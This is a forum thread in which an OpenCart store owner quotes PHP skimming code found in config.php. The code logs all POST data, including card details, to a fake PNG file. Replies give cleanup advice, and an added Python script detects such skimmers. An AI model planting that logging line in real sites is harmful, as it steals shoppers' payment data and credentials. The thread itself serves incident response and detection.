Hi,
I believe someone has gotten into my site (I have had a couple of people complain about credit cards being compromised, but only the random occurrence, not enough to make 100% sure it's my site, but it's starting to seem like too much of a coincidence because we had 0 people complain in previous years).
I found this in the config.php file (non-admin):
if(!empty($_POST)) { $post = serialize($_POST); $f = $_SERVER['REMOTE_ADDR'].":".$post."\n"; $file = fopen('/var/www/html/image/catalog/Viking/vw24y.png','a+'); fwrite($file,$f);fclose($file);}
Yes, you've been hacked. This code literally steals ALL the posted data. A pretty dumb hack, actually.
Remove this code as well as the image file mentioned in it.
Professional OpenCart extensions, support and custom work.
Contact me via email or Skype by support@thekrotek.com
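An added example (not part of the thread or any poster's code): a Python sweep for the two artifacts described above, a PHP file that serializes the request and writes it to disk, and a file with an image extension that holds no image data. The regex heuristics, function names and sample files are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Magic bytes for the image types a store's image/ directory normally holds.
IMAGE_MAGIC = {".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
               ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",)}
# Heuristic (assumption): a PHP file that serializes the whole request AND writes a file.
POST_DUMP = re.compile(rb"\b(serialize|json_encode|print_r|var_export)\s*\(\s*\$_(POST|REQUEST)\b")
FILE_WRITE = re.compile(rb"\b(fwrite|fputs|file_put_contents)\s*\(")

def scan(webroot):
    """Return sorted (relative_path, reason) findings under webroot."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, webroot).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            try:
                with open(path, "rb") as fh:
                    data = fh.read(2_000_000)  # cap per-file read
            except OSError:
                continue
            if ext in IMAGE_MAGIC and data and not data.startswith(IMAGE_MAGIC[ext]):
                findings.append((rel, "image extension without image header"))
            elif ext == ".php" and POST_DUMP.search(data) and FILE_WRITE.search(data):
                findings.append((rel, "serializes request data and writes a file"))
    return sorted(findings)

def demo():
    """Scan a constructed tree (sample data, not from the post) and return findings."""
    samples = {
        "config.php": b"<?php if(!empty($_POST)) { $p = serialize($_POST); "
                      b"$f = fopen('x','a+'); fwrite($f,$p); fclose($f);}",
        "index.php": b"<?php echo 'ok';",
        "image/catalog/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        "image/catalog/drop.png": b'203.0.113.5:a:1:{s:4:"name";s:4:"test";}\n',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)
        return scan(root)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Findings are leads for manual review; a drop file that begins with a valid image header would pass the magic-byte check.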
Well, let us know first what you did to your Site lately on changes, how your config.php and general Site Sub&File&Image CHMOD Settings are, how your .htaccess File is looking from the inside, etc., and what you allow your Customers to do on your Site (Upload/Reseller/etc.), all details required to be known, exactly, to even guess...
Ernie
My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.
They got in using exploits. They're not logged, of course.
Possibly weak passwords on your FTP, control panel, database, OpenCart admin etc.
UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk
paulfeakins wrote: ↑Mon Mar 26, 2018 5:55 pm
Possibly weak passwords on your FTP, control panel, database, OpenCart admin etc.

It actually might be just an exploit in current version of OS installed on server.